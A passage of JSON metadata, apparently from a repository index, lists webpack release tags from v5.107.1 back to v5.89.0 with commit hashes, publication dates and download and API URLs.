s"},{"name":"v5.107.1","sha":"a1ce7ebea4069d31ba27da07c07839d9dc1d69d6","kind":"tag","published_at":"2026-05-21T14:29:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.107.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.107.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.107.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.107.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.107.1/manifests"},{"name":"v5.107.0","sha":"4657874201bb3a098445fca14e2f271c82a3f91c","kind":"tag","published_at":"2026-05-20T09:40:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.107.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.107.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.107.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.107.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.107.0/manifests"},{"name":"v5.106.2","sha":"0d7e3e0153f0696311a590f90620506e8ab166ac","kind":"tag","published_at":"2026-04-15T11:44:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.106.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.106.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.106.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.106.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.106.2/manifests"},{"name":"v5.106.1","sha":"a934b9bb0330aba61e759ef943b7303ba305959f","kind":"tag","published_at":"2026-04-10T10:42:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.106.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.106.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.106.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.106.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.106.1/manifests"},{"name":"v5.106.0","sha":"8774a0110bea46f33fd2c504f59e698dbdcf136e","kind":"tag","published_at":"2026-04-08T15:11:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.106.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.106.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.106.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.106.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.106.0/manifests"},{"name":"v5.105.4","sha":"27c13b44c861908793f160f9f7413b32543c0522","kind":"tag","published_at":"2026-03-03T16:29:54.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.105.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.105.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.105.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.4/manifests"},{"name":"v5.105.3","sha":"714a0e3496f2189f76b5d2c98eacdeedae9e7c06","kind":"tag","published_at":"2026-02-26T10:27:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.105.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.105.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.105.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.3/manifests"},{"name":"v5.105.2","sha":"0756c7eb697a7759afe081a1fcf8f5481ea06bc3","kind":"tag","published_at":"2026-02-12T15:19:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.105.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.105.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.105.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.2/manifests"},{"name":"v5.105.1","sha":"8e50ef2035b9cb727aeaa97d7561545d1c102b91","kind":"tag","published_at":"2026-02-10T15:01:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.105.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.105.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.105.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.1/manifests"},{"name":"v5.105.0","sha":"1486f9aacca11d79dbb7ddbceed29b7e6df7a7ab","kind":"tag","published_at":"2026-02-03T15:30:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.105.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.105.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.105.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.0/manifests"},{"name":"v5.104.1","sha":"24e3c2d2c9f8c6d60810302b2ea70ed86e2863dc","kind":"commit","published_at":"2025-12-18T12:34:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.104.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.104.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.104.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.104.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.104.1/manifests"},{"name":"v5.104.0","sha":"505a5e744fbcf4471ddb534bf1d4aebea9643c1b","kind":"commit","published_at":"2025-12-16T13:03:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.104.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.104.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.104.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.104.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.104.0/manifests"},{"name":"v5.103.0","sha":"e0219482aafb9087a50ca0be45110727a33801fb","kind":"commit","published_at":"2025-11-18T11:07:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.103.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.103.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.103.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.103.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.103.0/manifests"},{"name":"v5.102.1","sha":"c7ebdbda637ea73a03a23446f5db0f600e304772","kind":"commit","published_at":"2025-10-07T16:26:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.102.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.102.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.102.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.102.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.102.1/manifests"},{"name":"v5.102.0","sha":"14c813a0b3709e142b3ed03355c6c15fc11b91a1","kind":"commit","published_at":"2025-09-29T18:24:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.102.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.102.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.102.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.102.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.102.0/manifests"},{"name":"v5.101.3","sha":"07b1ac0213bcf9591a8dd5633535a43ecd248192","kind":"commit","published_at":"2025-08-18T12:53:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.101.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.101.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.101.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.3/manifests"},{"name":"v5.101.2","sha":"1d9cc240a29d17f3986d9e9f96f2589d823e832c","kind":"commit","published_at":"2025-08-14T15:56:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.101.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.101.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.101.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.2/manifests"},{"name":"v5.101.1","sha":"4a0aa5d204dd0cfbaecd99f87be97deac5a883ff","kind":"commit","published_at":"2025-08-12T11:44:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.101.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.101.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.101.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.1/manifests"},{"name":"v5.101.0","sha":"5b87bedaf418b3cfa713d520bb70191098943917","kind":"commit","published_at":"2025-07-28T13:43:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.101.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.101.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.101.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.0/manifests"},{"name":"v5.100.2","sha":"21fcdbb8f2bb3820d3309df8e399c6deced12b42","kind":"commit","published_at":"2025-07-15T13:35:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.100.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.100.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.100.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.100.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.100.2/manifests"},{"name":"v5.100.1","sha":"ad1e3b46f46b9acd5bb9c377afcdc101338d5c96","kind":"commit","published_at":"2025-07-11T11:16:01.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.100.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.100.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.100.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.100.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.100.1/manifests"},{"name":"v5.100.0","sha":"83c534ca3a6385ee7037220c7ba510ba5a8d944c","kind":"commit","published_at":"2025-07-09T11:10:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.100.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.100.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.100.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.100.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.100.0/manifests"},{"name":"v5.99.9","sha":"6c9f912af2dfbb3e0e1a2a3ecdc3881c96363432","kind":"commit","published_at":"2025-05-20T11:50:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.9","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.9/manifests"},{"name":"v5.99.8","sha":"a9cbd85abf476fe8aba0cb1037f7e630f5f8649f","kind":"commit","published_at":"2025-05-06T13:04:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.8","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.8/manifests"},{"name":"v5.99.7","sha":"ad77deb6ed0b9540f9d2cf1a1c08f9d058a95da6","kind":"commit","published_at":"2025-04-25T10:47:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.7","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.7/manifests"},{"name":"v5.99.6","sha":"f8eee102c20a3d79eddfed0194113c4d5759d9e4","kind":"commit","published_at":"2025-04-18T12:05:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.6","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.6/manifests"},{"name":"v5.99.5","sha":"70e3d9d5dbd3548431b8878dead4647beff5c14f","kind":"commit","published_at":"2025-04-08T22:43:57.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.5","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.5/manifests"},{"name":"v5.99.4","sha":"04e00736b03eee0fabfd32eee5323ddc3701083f","kind":"commit","published_at":"2025-04-08T20:09:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.4/manifests"},{"name":"v5.99.3","sha":"2470d8e74c8b647203063826cae1ea5e691726a9","kind":"commit","published_at":"2025-04-08T14:49:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.3/manifests"},{"name":"v5.99.2","sha":"44da94f433c4adeb7ac56abc69df2b0f8a213486","kind":"commit","published_at":"2025-04-08T07:17:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.2/manifests"},{"name":"v5.99.1","sha":"2b2b705cc5c53594adf5adebca55f7273a1615c9","kind":"commit","published_at":"2025-04-07T22:34:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.1/manifests"},{"name":"v5.99.0","sha":"1bd06e333346656ef6542e36478f02055cab7369","kind":"commit","published_at":"2025-04-07T13:11:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.0/manifests"},{"name":"v5.98.0","sha":"f1bdec5cc70236083e45b665831d5d79d6485db7","kind":"tag","published_at":"2025-02-12T20:10:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.98.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.98.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.98.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.98.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.98.0/manifests"},{"name":"v5.97.1","sha":"3612d36e44bda5644dc3b353e2cade7fe442ba59","kind":"commit","published_at":"2024-12-05T14:17:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.97.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.97.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.97.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.97.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.97.1/manifests"},{"name":"v5.97.0","sha":"644f1d12716ba8f3c96d2efa279262560dd8c7fb","kind":"commit","published_at":"2024-12-03T11:06:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.97.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.97.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.97.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.97.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.97.0/manifests"},{"name":"v5.96.1","sha":"d4ced7322229c7d72a7a0d2ca955bdde0c910a0b","kind":"commit","published_at":"2024-11-01T10:59:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.96.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.96.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.96.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.96.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.96.1/manifests"},{"name":"v5.96.0","sha":"aff0c3ed2b31ed16ce8738e02f4b8f97966833f4","kind":"commit","published_at":"2024-10-31T22:01:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.96.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.96.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.96.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.96.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.96.0/manifests"},{"name":"v5.95.0","sha":"e20fd634fd24fab2c821a6e6114ace706ca052d0","kind":"commit","published_at":"2024-09-25T14:13:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.95.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.95.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.95.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.95.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.95.0/manifests"},{"name":"v5.94.0","sha":"eabf85d8580dfcb876b56957ba5488222a4f7873","kind":"commit","published_at":"2024-08-22T13:02:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.94.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.94.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.94.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.94.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.94.0/manifests"},{"name":"v5.93.0","sha":"277460b33bcc49c51acbbcd688672aa4ec685732","kind":"commit","published_at":"2024-07-11T18:28:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.93.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.93.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.93.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.93.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.93.0/manifests"},{"name":"v5.92.1","sha":"a82e0cd00e26d8452295f0d680417e4656a6d7cc","kind":"commit","published_at":"2024-06-19T16:19:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.92.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.92.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.92.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.92.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.92.1/manifests"},{"name":"v5.92.0","sha":"34e2561addb0f65a7a6fb0ce7ae1aea4cd1d599f","kind":"commit","published_at":"2024-06-11T14:50:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.92.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.92.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.92.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.92.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.92.0/manifests"},{"name":"v5.91.0","sha":"60daca54105f89eee45e118fd0bbc820730724ee","kind":"commit","published_at":"2024-03-20T16:11:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.91.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.91.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.91.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.91.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.91.0/manifests"},{"name":"v5.90.3","sha":"651b3d66d10d54da31d4cb7123ea74d10f1f5456","kind":"commit","published_at":"2024-02-19T12:32:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.90.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.90.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.90.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.3/manifests"},{"name":"v5.90.2","sha":"11c1be3d0838e8de31900aacabcd449e9da77eaf","kind":"commit","published_at":"2024-02-15T14:24:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.90.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.90.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.90.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.2/manifests"},{"name":"v5.90.1","sha":"08770761c8c7aa1e6e18b77d3deee8cc9871bd87","kind":"commit","published_at":"2024-02-01T17:09:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.90.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.90.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.90.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.1/manifests"},{"name":"v5.90.0","sha":"4a2662381ed8e6a9d849b494511459f5858d4e82","kind":"commit","published_at":"2024-01-24T13:09:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.90.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.90.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.90.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.0/manifests"},{"name":"v5.89.0","sha":"87660921808566ef3b8796f8df61bd79fc026108","kind":"tag","published_at":"2023-10-13T22:27:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.89.0","html_url":"https://github.com/webpack/